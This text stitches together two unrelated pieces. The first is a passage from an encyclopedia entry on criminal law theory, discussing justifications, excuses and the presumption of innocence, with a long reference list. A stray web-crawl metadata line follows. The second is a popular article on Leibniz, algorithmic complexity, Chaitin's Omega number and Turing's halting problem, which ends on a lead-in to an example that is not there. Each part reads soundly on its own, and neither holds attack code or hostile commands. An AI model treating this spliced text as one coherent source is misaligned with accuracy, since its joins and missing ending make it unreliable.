There are two reasons to answer the first question in the affirmative. One invokes (C). If courts are to develop criminal defences so that their contours track culpability, they need to know why each defence makes it the case that those who plead it are not culpable. Is there a defence of necessity because we sometimes do the right thing by choosing the lesser of two evils? Or does the defence exist because actors sometimes make wrongful choices under enormous pressure, and because there is sometimes nothing culpable about giving into the pressure? How courts should develop the defence depends on how they answer these questions. It depends on whether they conceive of the defence as a justification or an excuse.
A second reason to make the familiar distinction invokes the idea that criminal trials call defendants to account. On this view, trials are in one way continuous with life outside the law—they institutionalize our ordinary moral practice of making and replying to accusations (Gardner 2007, 177–200; Duff 2010c; 2011; 2013a). When accused of wrongdoing in our everyday lives, most of us do not only care about whether we end up being blamed. Where we did nothing wrong, we try to convince our accusers that this is the case: it matters to us that others not add wrongs to the story of our lives, even if we know that they will otherwise conclude that we acted blamelessly. There is no reason to think that things are different in criminal courts: that those accused of crime should, or do, care only about getting off the hook. By retaining distinct justificatory and excusatory defences, the criminal law gives effect to our interests in presenting ourselves—to our accusers and to others—in the best available rational light (Gardner 2007, 133).
Let us turn, then, to the second of our questions. Is it true that justifications deny wrongdoing? Is it true that excuses deny responsibility? Some think both questions should at least sometimes be answered in the negative. True, those who act in self-defence plausibly benefit from an exception to the duty not to harm others. Having placed \(D\) under attack, many think, \(V\) has no right that \(D\) not use necessary and proportionate force against \(V\) (McMahan 2005). But the same is not true when \(D\) harms an innocent bystander, even if this is the only way to prevent even greater harm to others. \(V\)’s right remains, it is often thought, but is sometimes overridden. So \(D\) still wrongs \(V\). That wrong is justified when and because \(D\) has undefeated reasons to commit it—reasons given by the greater harm prevented by \(D\). If this is right, those who plead a justification do not always deny, but sometimes concede, wrongdoing. It is the wrong that they then try to justify (Gardner 2007, 77–82).
The familiar account might be thought to be on firmer ground when it comes to excuses. Grant that to plead an excuse is indeed to deny culpability. The same is true of a justification. So there is nothing here to distinguish the two. Do excuses, then, deny responsibility? At least sometimes, they do not. True, those who plead insanity deny that they were capable of responding to reasons when they acted. But this is not true of other excusatory pleas. Imagine \(T\) bursts into \(D\)’s house and threatens to shoot \(D\) unless \(D\) shoots \(V\). If \(D\) pleads duress, \(D\) relies on the fact that her capacity to respond to reasons remained intact: her plea is that she offended in order to avoid the harm threatened by \(T\), and in doing so lived up to our reasonable expectations. \(D\) thereby asserts rather than denies responsibility for an offending act (Gardner 2007, 82–87). This does not mean that duress is a justification. \(V\)’s right to life defeats the reasons \(D\) has to save her own. \(D\) has a defence because we do not expect any more from someone in \(D\)’s predicament—because we can understand why saving her own life seemed a good enough reason to \(D\) (Simester 2012, 105).
Two points emerge from these remarks. One is that the familiar account of the justification/excuse distinction should be rejected. The second is that a bipartite classification of criminal defences obscures distinctions we have reason to make. Some respond by distinguishing denials of responsibility (like insanity) from excuses (like duress), and distinguishing both from justifications (like self-defence and necessity). Excuses and justifications, so understood, are both assertions of responsibility and denials of culpability. Justified actors have undefeated reasons for their actions. Excused actors live up to reasonable expectations despite lacking such reasons (Gardner 2007, 91–139; Simester 2012, 99–108). Though this tripartite classification is an improvement, some maintain that further distinctions should be drawn (Duff 2007, 263–298; Simester 2012). Just how numerous the categories of criminal defence are (or ought to be) is a topic for future work.
6. Criminal Procedure and Evidence
Imagine there are reasons to believe that \(D\) is criminally responsible for having \(\phi\)ed. What may officials of the criminal justice system do in response to those reasons? What should they do, and refrain from doing?
As a matter of law, the answer depends on norms of criminal procedure and evidence. Some of these norms confer powers and permissions that help officials build their case against \(D\). Think of stop and search, intrusive forms of surveillance, and pre-trial detention. Other norms regulate the kinds of evidence that may be used against \(D\) in court. Think of hearsay, or statistical evidence, or evidence of \(D\)’s bad (or good) character (Ho 2008; Redmayne 2015). Yet other norms govern the way in which one aspect of the criminal justice system should respond to the misconduct of others. Imagine evidence against \(D\) was gathered illegally, or that \(D\) was entrapped, or that \(D\)’s case should have been discontinued according to the guidelines prosecutors set for themselves. Should the courts throw out \(D\)’s case, even where the evidence against \(D\) is strong? If so, on what grounds should they do so? (Ashworth 2000; Duff et al 2007, 225–257).
The norms I have mentioned are somewhat neglected by philosophers of criminal law. Things are different when it comes to the so-called presumption of innocence (PI). The most well-known judicial formulation of (PI) is found in Woolmington v DPP [1935] UKHL 1:
Throughout the web of the English Criminal Law one golden thread is always to be seen … No matter what the charge or where the trial, the principle that the prosecution must prove the guilt of the prisoner is part of the common law of England and no attempt to whittle it down can be entertained.
So understood, (PI) allocates the burden of proof in criminal trials to those on the accusing side. Many add that \(D\)’s accusers must meet an especially high standard of proof—they must eliminate all reasonable doubt to secure a conviction. Though these points are widely accepted, they leave open a range of further questions about the scope and basis of (PI). The following remarks touch on just some (for an overview, see Lippke 2016).
One question is whether (PI) has implications for criminal procedure that extend beyond the criminal trial. On one view, (PI) just is a norm that governs the burden and standard of proof at trial. On another, (PI) is something more expansive: it is a norm that tells criminal justice officials—and, perhaps, the rest of us too—how to interact with others, including those suspected of crime (Stewart 2014, Duff 2013b). That norm of course has implications for the moment of trial. But its implications extend both backwards and forwards from that point in time. They extend backwards to decisions about whether to arrest, prosecute, or detain those suspected of criminality (Ashworth 2006, 249; Duff 2013b, 180–185; Stewart 2014, 414). And they extend forwards to decisions both about how much to punish (Tomlin 2014a), and about the appropriate collateral consequences of conviction and punishment (Duff 2013b, 185–192).
A second question is whether (PI) has implications for the substantive criminal law. Some writers—and most courts—think not. They give (PI) a purely procedural interpretation (Roberts 2005; Lippke 2016). It has been argued, however, that all such interpretations are implausibly narrow (Tadros 2007; 2014; Tomlin 2013). Imagine it is an offence to possess information of a kind that might be useful to terrorists, with the intention of committing acts of terror. Intentions like this are often difficult to prove. Legislators might respond by shifting the burden of proof to \(D\): they might make it the case that, once the prosecution proves possession, it is for \(D\) to prove the absence of intention. The Woolmington formulation suggests that this move violates (PI). Now imagine a creative legislature simply eliminates the requirement of intention from the law: it becomes a crime to possess information of a kind that might be useful to terrorists, whatever the possessor’s intentions might be. Assuming that the prosecution must prove every element of the revised offence, this move brings the law into conformity with a purely procedural (PI). Now most writers—and most human rights treaties—consider (PI) to be an important right that protects criminal suspects against the state. Examples like the above show that the purely procedural interpretation has the following implication: legislators who offer suspects less protection somehow better conform to the right. Not only is this counterintuitive, it renders the right toothless in the face of legislative creativity (Tadros 2014). This is, some conclude, sufficient reason to reject the purely procedural (PI).
Imagine \(D\) is charged with a criminal offence and pleads not guilty. On the purely procedural view, (PI) makes it a precondition of conviction and punishment that the prosecution prove \(D\) satisfied all elements of the offence. What those elements are is a separate question. Some endorse a revised view that makes (PI) more demanding. These writers distinguish between elements of offences, and the wrongs taken by offence-creators to justify convicting and punishing offenders. (PI), they claim, not only requires proof that \(D\) satisfied the former; it also requires proof that \(D\) committed the latter (Tadros 2007; 2014).
To see the difference this revision makes, imagine legislators make it an offence to possess information that might be useful to terrorists. An intention to commit acts of terror is no element of the offence as legislated. Our legislators do not, however, think that all those who possess such information should be convicted and punished. This, they know, would be ridiculous overkill. They think that possessors who intend to commit acts of terror should be convicted and punished. This element of intention is omitted from the offence, because omitting it makes securing convictions easier for prosecutors, thereby reducing the risk that those planning acts of terror will get off the hook. (PI), on the revised view, nonetheless requires proof of the intent: ex hypothesi, it is possession with an intention to commit acts of terror that is taken by law-makers to justify convicting and punishing offenders. To comply with (PI), criminal courts must demand proof that \(D\) committed this wrong as a precondition of conviction and punishment.
So understood, (PI) is anything but toothless. It is often claimed, nowadays, that too few suspected wrongdoers are convicted of crimes, and that new criminal laws are needed to help secure more convictions. On the revised view, legislators can create as many criminal laws as they want in pursuit of this objective. But no-one who pleads not guilty may be convicted under them without proof that they are the wrongdoers they are suspected of being. That it provides anyone who faces criminal charges with this kind of protection against the law is what makes the case for the revised (PI).
- Alexander, L., 2002, “Criminal Liability for Omissions – An Inventory of Issues” in S. Shute and A.P. Simester (eds.), Criminal Law Theory: Doctrines of the General Part, Oxford: Oxford University Press.
- Alexander, L. and Ferzan, K.K., 2009, Crime and Culpability: A Theory of Criminal Law, Cambridge: Cambridge University Press.
- Ashworth, A., 1993, “Taking the Consequences”, in S. Shute, J. Gardner, and J. Horder (eds.), Action and Value in Criminal Law, Oxford: Oxford University Press.
- –––, 2000, “Testing Fidelity to Legal Values: Official Involvement and Criminal Justice”, Modern Law Review, 63: 633–659.
- –––, 2006, “Four Threats to the Presumption of Innocence”, International Journal of Evidence & Proof, 10: 241–278.
- –––, 2008, “A Change of Normative Position: Determining the Contours of Culpability in Criminal Law”, New Criminal Law Review, 11: 232–256.
- –––, 2015, Positive Obligations in Criminal Law, Oxford: Oxford University Press.
- Ashworth, A., and L. Zedner, 2010, “Preventive Orders: A Problem of Under-Criminalization?”, in R.A. Duff, et al. (eds.), The Boundaries of the Criminal Law, Oxford: Oxford University Press.
- Austin, J. L., 1956, “A Plea for Excuses”, Proceedings of the Aristotelian Society, 57: 1–30.
- Baron, M., 2005, “Justifications and excuses”, Ohio State Journal of Criminal Law, 2: 387–406.
- Boonin, D., 2008, The Problem of Punishment, New York: Cambridge University Press.
- Brink, D., 2013, Mill’s Progressive Principles, Oxford: Oxford University Press.
- Campbell, K., 1987, “Offence and Defence”, in I. Dennis (ed.), Criminal Law and Justice, London: Sweet and Maxwell.
- Chalmers, J. and F. Leverick, 2008, “Fair Labelling in Criminal Law”, Modern Law Review, 71: 217–246.
- Chiao, V., 2016, “What is the Criminal Law For?”, Law and Philosophy, 35: 137–163.
- Christie, N., 1977, “Conflicts as Property”, British Journal of Criminology, 17: 1–15.
- Coons, C., and M. Weber (eds.), 2013, Paternalism: Theory and Practice, Cambridge: Cambridge University Press.
- Dan-Cohen, M., 2002, Harmful Thoughts: Essays on Law, Self, and Morality, Princeton: Princeton University Press.
- Dempsey, M. M., 2009, Prosecuting Domestic Violence, Oxford: Oxford University Press.
- –––, 2011, “Public Wrongs and the Criminal Law’s Business: When Victims Won’t Share”, in R. Cruft, M.H. Kramer, and M.R. Reiff (eds.), Crime, Punishment and Responsibility: The Jurisprudence of Antony Duff, Oxford: Oxford University Press.
- Devlin, P., 1965, The Enforcement of Morals, Oxford: Oxford University Press.
- Dorfman, A., and A. Harel, 2016, “Against Privatisation As Such”, Oxford Journal of Legal Studies, 36: 400–427.
- Duarte d’Almeida, L., 2015, Allowing for Exceptions: A Theory of Defences and Defeasibility in Law, Oxford: Oxford University Press.
- Duff, R. A., 2005, “Strict Liability, Legal Presumptions, and the Presumption of Innocence”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- –––, 2007, Answering for Crime: Responsibility and Liability in the Criminal Law, Oxford: Hart Publishing.
- –––, 2010a, “A Criminal Law for Citizens”, Theoretical Criminology, 14: 293–309.
- –––, 2010b, “Perversions and Subversions of Criminal Law”, in R.A. Duff, et al. (eds.), The Boundaries of the Criminal Law, Oxford: Oxford University Press.
- –––, 2010c, “Towards a Theory of Criminal Law”, Aristotelian Society Supplementary Volume, 84: 1–28.
- –––, 2011, “Responsibility, Citizenship and Criminal Law”, in R.A. Duff and S.P. Green (eds.), Philosophical Foundations of Criminal Law, Oxford: Oxford University Press.
- –––, 2013a, “Relational Reasons and the Criminal Law”, in L. Green and B. Leiter (eds.), Oxford Studies in Philosophy of Law (Volume 2), Oxford: Oxford University Press.
- –––, 2013b, “Who Must Presume Whom To Be Innocent of What?”, Netherlands Journal of Legal Philosophy, 42: 170–92.
- –––, 2014a, “Torts, Crimes and Vindication: Whose Wrong Is It?”, in M. Dyson (ed.), Unravelling Tort and Crime, Cambridge: Cambridge University Press.
- –––, 2014b, “Towards a Modest Legal Moralism”, Criminal Law and Philosophy, 8: 217–235.
- –––, 2016, “Legal Moralism and Public Wrongs”, in K.K. Ferzan and S.J. Morse (eds.), Legal, Moral and Metaphysical Truths: The Philosophy of Michael S. Moore, Oxford: Oxford University Press.
- Duff, R.A. and S. Marshall, 2010, “Public and Private Wrongs”, in J. Chalmers, F. Leverick, and L. Farmer (eds.), Essays in Criminal Law in Honour of Sir Gerald Gordon, Edinburgh: Edinburgh University Press.
- Duff, R.A. et al., 2007, The Trial on Trial (Volume 3), Oxford: Hart Publishing.
- Duff, R.A. et al. (eds.), 2014, Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Dworkin, G., 1972, “Paternalism”, The Monist, 56: 64–84.
- Edwards, J.R., 2014, “Harm Principles”, Legal Theory, 20: 253–285.
- –––, forthcoming, “Criminal Law’s Asymmetry”, Jurisprudence.
- Edwards, J.R., and A.P. Simester, 2014, “Prevention with a Moral Voice”, in A.P. Simester, A. du Bois-Pedain, and U. Neumann (eds.), Liberal Criminal Theory: Essays for Andreas von Hirsch, Oxford: Hart Publishing.
- –––, 2017, “What’s Public About Crime?”, Oxford Journal of Legal Studies, 37: 105–133.
- Feinberg, J., 1970, “The Expressive Function of Punishment”, in J. Feinberg, Doing and Deserving, Princeton: Princeton University Press.
- –––, 1984, Harm to Others, New York: Oxford University Press.
- –––, 1986, Harm to Self, New York: Oxford University Press.
- –––, 1988, Harmless Wrongdoing, New York: Oxford University Press.
- Fletcher, G., 1978, Rethinking Criminal Law, Boston: Little, Brown and Company.
- Gardner, J., 2005, “Wrongs and Faults”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- –––, 2007, Offences and Defences, Oxford: Oxford University Press.
- –––, 2011, “What is Tort Law For? Part 1. The Place of Corrective Justice”, Law and Philosophy, 30: 1–50.
- –––, 2013, “Punishment and Compensation: A Comment”, in R.L. Christopher (eds.), Fletcher’s Essays on Criminal Law, Oxford: Oxford University Press.
- Gardner, J. and S. Shute, 2000, “The Wrongness of Rape” in J. Horder (ed.), Oxford Essays in Jurisprudence: Fourth Series, Oxford: Oxford University Press.
- Green, L., 2013a, “Should Law Improve Morality?”, Criminal Law and Philosophy, 7: 473–494.
- –––, 2013b, “The Nature of Limited Government”, in J. Keown and R.P. George (eds.), Reason, Morality and Law: The Philosophy of John Finnis, Oxford: Oxford University Press.
- Greenawalt, K., 1984, “The Perplexing Borders of Justification and Excuse”, Columbia Law Review, 84: 1897–1927.
- Hamlin, A., and Z. Stemplowska, 2012, “Theory, Ideal Theory and the Theory of Ideals”, Political Studies Review, 10: 48–62.
- Harcourt, B.E., 1999, “The Collapse of the Harm Principle”, Journal of Criminal Law and Criminology, 90: 109–192.
- Harel, A., 2014, Why Law Matters, Oxford: Oxford University Press.
- Hart, H. L. A., 1963, Law, Liberty and Morality, New York: Random House.
- –––, 1968, Punishment and Responsibility, Oxford: Oxford University Press.
- –––, 1994, The Concept of Law, 2nd edition, Oxford: Oxford University Press.
- Hart, H.L.A., and A.M. Honoré, 1959, Causation in the Law, Oxford: Clarendon Press.
- Ho, H.L., 2008, A Philosophy of Evidence Law: Justice in the Search for Truth, Oxford: Oxford University Press.
- Holtug, N., 2002, “The Harm Principle”, Ethical Theory and Moral Practice, 5: 357–89.
- Hoskins, Z., 2014, “Ex-Offender Restrictions”, Journal of Applied Philosophy, 31: 33–48.
- –––, 2016, “Collateral Restrictions”, in C. Flanders and Z. Hoskins (eds.), The New Philosophy of Criminal Law, London: Rowman & Littlefield.
- Husak, D., 2008, Overcriminalization, Oxford: Oxford University Press.
- –––, 2014, “Polygamy: A Novel Test for a Theory of Criminalization” in R. A. Duff, et al. (eds.), Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Lamond, G., 2007, “What is a Crime?”, Oxford Journal of Legal Studies, 27: 609–32.
- Lee, A.Y.K., 2015, “Public Wrongs and the Criminal Law”, Criminal Law and Philosophy, 9: 155–170.
- Lippke, R., 2016, Taming the Presumption of Innocence, Oxford: Oxford University Press.
- Marshall, S. E., and R.A. Duff, 1998, “Criminalization and Sharing Wrongs”, Canadian Journal of Law & Jurisprudence, 11: 7–22.
- McMahan, J., 2005, “The Basis of Moral Liability to Defensive Killing”, Philosophical Issues, 15: 386–405.
- Mill, J. S., 1859, On Liberty, London: Parker.
- Moore, M. S., 1997, Placing Blame: A Theory of Criminal Law, Oxford: Oxford University Press.
- –––, 2009a, “A Tale of Two Theories”, Criminal Justice Ethics, 28: 27–48.
- –––, 2009b, Causation and Responsibility, Oxford: Oxford University Press.
- –––, 2014, “Liberty’s Constraints on What Should be Made Criminal”, in R. A. Duff, et al. (eds.), Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Moore, M. S., and H. Hurd, 2011, “Punishing the Awkward, the Stupid, the Weak, and the Selfish: The Culpability of Negligence”, Criminal Law and Philosophy, 5: 147–198.
- Nagel, T., 1979, Mortal Questions, New York: Cambridge University Press.
- Raz, J., 1986, The Morality of Freedom, Oxford: Oxford University Press.
- Redmayne, M., 2015, Character in the Criminal Trial, Oxford: Oxford University Press.
- Roberts, P., 2005, “Strict Liability and the Presumption of Innocence: An Expose of Functionalist Assumptions” in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- Ripstein, A., 2006, “Beyond the Harm Principle”, Philosophy and Public Affairs, 34: 215–45.
- –––, 2009, Force and Freedom, Cambridge, MA: Harvard University Press.
- Schauer, F., 1991, Playing By The Rules, Oxford: Oxford University Press.
- Simester, A. P., 2000, “Can Negligence Be Culpable?” in J. Horder (ed.), Oxford Essays in Jurisprudence: Fourth Series, Oxford: Oxford University Press.
- –––, 2005, “Is Strict Liability Always Wrong?”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- –––, 2006, “The Mental Element in Complicity”, Law Quarterly Review, 122: 578–601.
- –––, 2012, “On Justifications and Excuses”, in L. Zedner and J. Roberts (eds.), Principles and Values in Criminal Law and Criminal Justice: Essays in Honour of Andrew Ashworth, Oxford: Oxford University Press.
- –––, 2013, “A Disintegrated Theory of Culpability”, in D.J. Baker and J. Horder (eds.), The Sanctity of Life: The Legacy of Glanville Williams, Cambridge: Cambridge University Press.
- –––, 2017, “Causation in (Criminal) Law”, Law Quarterly Review, 133: 416–441.
- Simester, A. P., and W. Chan, 2011, “Four Functions of Mens Rea”, Cambridge Law Journal, 70: 381–396.
- Simester, A. P., and A. von Hirsch, 2011, Crimes, Harms, and Wrongs: On the Principles of Criminalization, Oxford: Hart Publishing.
- Stewart, H., 2010, “The Limits of the Harm Principle”, Criminal Law and Philosophy, 4: 17–35.
- –––, 2014, “The Right to Be Presumed Innocent”, Criminal Law and Philosophy, 8: 407–420.
- Tadros, V., 2007, “Rethinking the Presumption of Innocence”, Criminal Law and Philosophy, 1: 193–213.
- –––, 2011a, “Harm, Sovereignty and Prohibition”, Legal Theory, 17: 35–65.
- –––, 2011b, “Independence Without Interests”, Oxford Journal of Legal Studies, 31: 193–213.
- –––, 2011c, The Ends of Harm: The Moral Foundations of Criminal Law, Oxford: Oxford University Press.
- –––, 2014, “The Ideal of the Presumption of Innocence”, Criminal Law and Philosophy, 8: 449–467.
- –––, 2016, Wrongs and Crimes, Oxford: Oxford University Press.
- Thorburn, M., 2011a, “Constitutionalism and the Limits of the Criminal Law”, in R. A. Duff, et al. (eds.), The Structures of the Criminal Law, Oxford: Oxford University Press.
- –––, 2011b, “Criminal Law as Public Law”, in R.A. Duff and S.P. Green (eds.), Philosophical Foundations of Criminal Law, Oxford: Oxford University Press.
- Tomlin, P., 2013, “Extending the Golden Thread? Criminalisation and the Presumption of Innocence”, Journal of Political Philosophy, 21: 44–66.
- –––, 2014a, “Could the Presumption of Innocence Protect the Guilty?”, Criminal Law and Philosophy, 8: 431–447.
- –––, 2014b, “Retributivists! The Harm Principle is Not For You!”, Ethics, 124: 274–298.
- United Nations Office on Drugs and Crime, 2015, “Briefing Paper: Decriminalisation of Drug Use and Possession for Personal Consumption”.
- Wellman, C.H., 2005, “Samaritanism and the Duty to Obey the Law”, in C.H. Wellman and A.J. Simmons (eds.), Is There A Duty to Obey the Law? For and Against, Cambridge: Cambridge University Press.
- –––, 2013, “Rights Forfeiture and Mala Prohibita”, in R.A. Duff, et al. (eds.), The Constitution of the Criminal Law, Oxford: Oxford University Press.
- Williams, G., 1982, “Offences and Defences”, Legal Studies, 2: 233–256.
Other Internet Resources
- Duff, Antony, “Theories of Criminal Law,” Stanford Encyclopedia of Philosophy (Summer 2018 Edition), Edward N. Zalta (ed.), URL = <https://plato.stanford.edu/archives/sum2018/entries/criminal-law/>. [This was the previous entry on Theories of Criminal Law in the Stanford Encyclopedia of Philosophy — see the version history.] | <urn:uuid:9483c02c-7365-4dce-9c72-73a4b94dc8e2> | CC-MAIN-2023-14 | https://plato.sydney.edu.au/entries/criminal-law/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943555.25/warc/CC-MAIN-20230320175948-20230320205948-00609.warc.gz | en | 0.943193 | 25,314 | 2.90625 | 3 |
Over the millennia, many mathematicians have hoped that mathematics would one day produce a Theory of Everything (TOE): a finite set of axioms and rules from which every mathematical truth could be derived. But in 1931 this hope received a serious blow: Kurt Gödel published his famous incompleteness theorem, which states that any consistent mathematical theory rich enough to express arithmetic, no matter how extensive, will always contain statements that can neither be proved nor disproved within the theory.
Gregory Chaitin has been fascinated by this theorem ever since he was a child, and now, in time for the centenary of Gödel's birth in 2006, he has published his own book on the subject, called Meta Math! (you can read a review in this issue of Plus). It describes his journey, which, from the work of Gödel via that of Leibniz and Turing, led him to the number Omega, which is so complex that no mathematical theory can ever describe it. In this article he explains what Omega is all about, why maths can have no Theory of Everything, and what this means for mathematicians.
My story begins with Leibniz in 1686, the year before Newton published his Principia. Due to a snow storm, Leibniz is forced to take a break in his attempts to improve the water pumps for some important German silver mines, and writes down an outline of some of his ideas, now known to us as the Discours de métaphysique. Leibniz then sends a summary of the major points through a mutual friend to the famous fugitive French philosophe Arnauld, who is so horrified at what he reads that Leibniz never sends him, nor anyone else, the entire manuscript. It languishes among Leibniz's voluminous personal papers and is only discovered and published many years after Leibniz's death.
In sections V and VI of the Discours de métaphysique, Leibniz discusses the crucial question of how we can distinguish a world which can be explained by science from one that cannot. How do we tell whether something we observe in the world around us is subject to some scientific law or just patternless and random? Imagine, Leibniz says, that someone has splattered a piece of paper with ink spots, determining in this manner a finite set of points on the page. Leibniz observes that, even though the points were splattered randomly, there will always be a mathematical curve that passes through this finite set of points. Indeed, many good ways to do this are now known. For example, what is called "Lagrangian interpolation" will do.
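Leibniz's observation is easy to demonstrate. The sketch below (plain Python; the example points are hypothetical, not from the article) builds the Lagrange interpolating polynomial through an arbitrary finite set of points with distinct x-coordinates, so a curve always exists no matter how the "ink spots" were splattered:

```python
from fractions import Fraction

def lagrange(points):
    """Return a function interpolating the given (x, y) points.

    Lagrange form: L(x) = sum_i y_i * prod_{j != i} (x - x_j)/(x_i - x_j).
    The x-coordinates must be distinct. Exact rational arithmetic is used
    so the interpolation property can be checked without rounding error.
    """
    pts = [(Fraction(x), Fraction(y)) for x, y in points]

    def L(x):
        x = Fraction(x)
        total = Fraction(0)
        for i, (xi, yi) in enumerate(pts):
            term = yi
            for j, (xj, _) in enumerate(pts):
                if j != i:
                    term *= (x - xj) / (xi - xj)
            total += term
        return total

    return L

# "Randomly splattered" spots: some curve still passes through all of them.
spots = [(0, 3), (1, -2), (2, 7), (5, 0)]
curve = lagrange(spots)
assert all(curve(x) == y for x, y in spots)
```

As Leibniz's argument anticipates, the curve's formula grows with the number of points, which is exactly why its mere existence tells us nothing about lawfulness.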
So the existence of a mathematical curve passing through a set of points cannot enable us to distinguish between points that are chosen at random and those that obey some kind of a scientific law. How, then, can we tell the difference? Well, says Leibniz, if the curve that contains the points must be extremely complex ("fort composée"), then it's not much use in explaining the pattern of the ink splashes. It doesn't really help to simplify matters and therefore isn't valid as a scientific law — the points are random ("irrégulier"). The important insight here is that something is random if any description of it is extremely complex — randomness is complexity.
Leibniz had a million other interests and earned a living as a consultant to princes, and as far as I know after having this idea he never returned to this subject. Indeed, he was always tossing out good ideas, but rarely, with the notable exception of the infinitesimal calculus, had the time to develop them in depth.
The next person to take up this subject, as far as I know, is Hermann Weyl in his 1932 book The Open World, consisting of three lectures on metaphysics that Weyl gave at Yale University. In fact, I discovered Leibniz's work on complexity and randomness by reading this little book by Weyl. And Weyl points out that Leibniz's way of distinguishing between points that are random and those that follow a law by invoking the complexity of a mathematical formula is unfortunately not too well defined: it depends on what functions you are allowed to use in writing that formula. What is complex to one person at one particular time may not appear to be complex to another person a few years later — defined in this way, complexity is in the eye of the beholder.
What is complexity?
Well, the field that I invented in 1965, and which I call algorithmic information theory, provides a possible solution for the problem of how to measure complexity. The main idea is that any scientific law, which explains or describes mathematical objects or sets of data, can be turned into a computer program that can compute the original object or data set.
Say, for example, that you haven't splattered the ink on the page randomly, but that you've carefully placed the spots on a straight line which runs through the page, each spot exactly one centimetre away from the previous one. The theory describing your set of points would consist of four pieces of information: the equation for the straight line, the total number of spots, the precise location of the first spot, and the fact that the spots are one centimetre apart.
You can now easily write a computer program, based on this information, which computes the precise location of each spot. In algorithmic information theory, we don't just say that such a program is based on this underlying theory, we say it is the theory.
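Such a program-as-theory might look like the following sketch (the function name, coordinate convention, and example values are illustrative assumptions, not taken from the article):

```python
def spot_locations(start, direction, spacing_cm, count):
    """The 'theory' of the evenly spaced ink spots, written as a program.

    start      -- (x, y) of the first spot
    direction  -- unit vector along the straight line
    spacing_cm -- distance between consecutive spots, in centimetres
    count      -- total number of spots
    """
    x0, y0 = start
    dx, dy = direction
    return [(x0 + i * spacing_cm * dx, y0 + i * spacing_cm * dy)
            for i in range(count)]

# Five spots on a horizontal line, 1 cm apart, starting at (2, 10).
print(spot_locations((2, 10), (1, 0), 1, 5))
# → [(2, 10), (3, 10), (4, 10), (5, 10), (6, 10)]
```

The four inputs are exactly the four pieces of information in the theory; the program computes every spot from them.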
This gives a way of measuring the complexity of the underlying object (in this case our ink stains): it is simply the size of the smallest computer program that can compute the object. The size of a computer program is the number of "bits" it contains: as you will know, computers store their information in strings of 0s and 1s, and each 0 or 1 is called a "bit". The more complicated the program, the longer it is and the more bits it contains. If something we observe is subject to a scientific law, then this law can be encoded as a program. What we desire from a scientific law is that it be simple — the simpler it is, the better our understanding, and the more useful it is. And its simplicity — or lack of it — is reflected in the length of the program.
In our example, the complexity of the ink stains is precisely the length in bits of the smallest computer program which comprises our four pieces of information and can compute the location of the spots. In fact, the ink spots in this case are not very complex at all.
We have added two ideas to Leibniz's 1686 proposal. First, we measure complexity in terms of bits of information, i.e. 0s and 1s. Second, instead of mathematical equations, we use binary computer programs. Crucially, this enables us to compare the complexity of a scientific theory (the computer program) with the complexity of the data that it explains (the output of the computer program, the location of our ink stains).
As Leibniz observed, for any data there is always a complicated theory, which is a computer program that is the same size as the data. But that doesn't count. It is only a real theory if there is compression, if the program is much smaller than its output, both measured in 0/1 bits. And if there can be no proper theory, then the bit string is called algorithmically random or irreducible. That's how you define a random string in algorithmic information theory.
Let's look at our ink stains again. To know where each spot is, rather than writing down its precise location, you're much better off remembering the four pieces of information. They give a very efficient theory which explains the data. But what if you place the ink spots in a truly random fashion, by looking away and flicking your pen? Then a computer program which can compute the location of each spot for you has no choice but to store the co-ordinates that give you each location. It is just as long as its output and doesn't simplify your data set at all. In this case, there is no good theory, the data set is irreducible, or algorithmically random.
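The true size of the smallest program is uncomputable, but an ordinary compressor gives a crude, practical stand-in for the same contrast. In this sketch (zlib as a rough proxy, not the algorithmic-information measure itself), a bit string generated by a simple law compresses dramatically, while a coin-flip string barely compresses at all:

```python
import random
import zlib

def compressed_size(bits: str) -> int:
    """Size in bytes of the zlib-compressed bit string (a proxy for program size)."""
    return len(zlib.compress(bits.encode()))

n = 10_000
patterned = "01" * (n // 2)                             # simple law: alternate 0 and 1
random.seed(0)
rand_bits = "".join(random.choice("01") for _ in range(n))  # no law, just coin flips

print(compressed_size(patterned))   # tiny: a short "theory" reproduces the data
print(compressed_size(rand_bits))   # large: the data is close to irreducible
```

The patterned string admits real compression, so it has a good theory; the random string does not, which is the algorithmic-information sense in which it is random.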
I should point out that Leibniz had the two key ideas that you need to get this modern definition of randomness, he just never made the connection. For Leibniz produced one of the first calculating machines, which he displayed at the Royal Society in London, and he was also one of the first people to appreciate base-two binary arithmetic and the fact that everything can be represented using only 0s and 1s. So, as Martin Davis argues in his book The Universal Computer: The Road from Leibniz to Turing, Leibniz was the first computer scientist, and he was also the first information theorist. I am sure that Leibniz would have instantly understood and appreciated the modern definition of randomness.
I should also mention that A. N. Kolmogorov also proposed this definition of randomness. He and I did this independently in 1965. Kolmogorov was at the end of his career, and I was a teenager at the beginning of my own career as a mathematician. As far as I know, neither of us was aware of the Leibniz Discours. But Kolmogorov never realized, as I did, that the really important application of these ideas was the new light that they shed on Gödel's incompleteness theorem and on Alan Turing's famous halting problem.
So let me tell you about that now. I'll tell you how my Omega number possesses infinite complexity and therefore cannot be explained by any finite mathematical theory. This shows that in a sense there is randomness in pure mathematics, and that there cannot be any TOE.
Omega is so complex because its definition is based on an unsolvable problem — Turing's halting problem. Let's have a look at this now.
Turing's halting problem
In 1936, Alan Turing stunned the mathematical world by presenting a model for the first digital computer, which is today known as the Turing Machine. And as soon as you start thinking about computer programs, you are faced with the following, very basic question: given any program, is there an algorithm, a sure-fire recipe, which decides whether the program will eventually stop, or whether it'll keep on running forever?
Let's look at a couple of examples. Suppose your program consists of the instruction "take every number between 1 and 10, add 2 to it and then output the result". It's obvious that this program halts after 10 steps. If, however, the instructions are "take a number x, which is not negative, and keep multiplying it by 2 until the result is bigger than 1", then the program will stop as long as the input x is not 0. If it is 0, it will keep going forever.
In these two examples it is easy to see whether the program stops or not. But what if the program is much more complicated? Of course you can simply run it and see if it stops, but how long should you wait before you decide that it doesn't? A week, a month, a year? The basic question is whether there is a test which in a finite amount of time decides whether or not any given program ever halts.
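The "run it and see" strategy can be sketched for the doubling program from the previous paragraph. Note the asymmetry: with a step budget the simulator can report "halted", but a timeout only ever means "don't know", never "runs forever" (the function name and budget are illustrative):

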